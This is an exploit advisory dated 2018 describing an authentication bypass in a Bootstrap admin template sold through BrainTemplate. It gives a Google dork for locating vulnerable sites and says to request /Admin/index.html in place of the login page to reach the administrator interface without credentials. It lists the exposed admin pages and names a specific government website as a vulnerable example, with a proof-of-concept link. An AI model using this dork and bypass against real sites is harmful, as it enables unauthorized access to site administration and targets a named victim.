
© Vincent Gabriel 2013 Bootstrap Templates WordPress at BrainTemplate Improper Authorization Vulnerability

Author: KingSkrupellos, Published: 01-11-2018
# Exploit Title : © Vincent Gabriel 2013 Bootstrap Templates WordPress at BrainTemplate Improper Authorization Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 01/11/2018
# Vendor Homepage : braintemplate.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork : intext:''© Vincent Gabriel 2013 : Bootstrap templates, Bootstrap wordpress download at Braintemplate.com''
# Exploit Risk : Medium
# CWE : CWE-287 [ Improper Authentication ] - CWE-284 [ Improper Access Control ] - CWE-285 [ Improper Authorization ] - CWE-269 [ Improper Privilege Management ]

#################################################################################################

# Admin Panel Login Path :

The administration control panel login page is here:

/Admin/login.php

It asks for a username and password.

The login can be skipped. Remove /login.php from the URL and request this path after the target domain instead:

/Admin/index.html

No username and no password are required. The panel pages are served without any credential check, so the visitor gets the site administrator interface.

# Exploits :

/Admin/calendar.html
/Admin/stats.html
/Admin/form.html
/Admin/tables.html
/Admin/buttons.html
/Admin/editors.html
/Admin/interface.html

#################################################################################################

# Example Vulnerable Site =>

phuho.go.th/Admin/index.html => [ Proof of Concept ] => archive.is/rpuMt

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
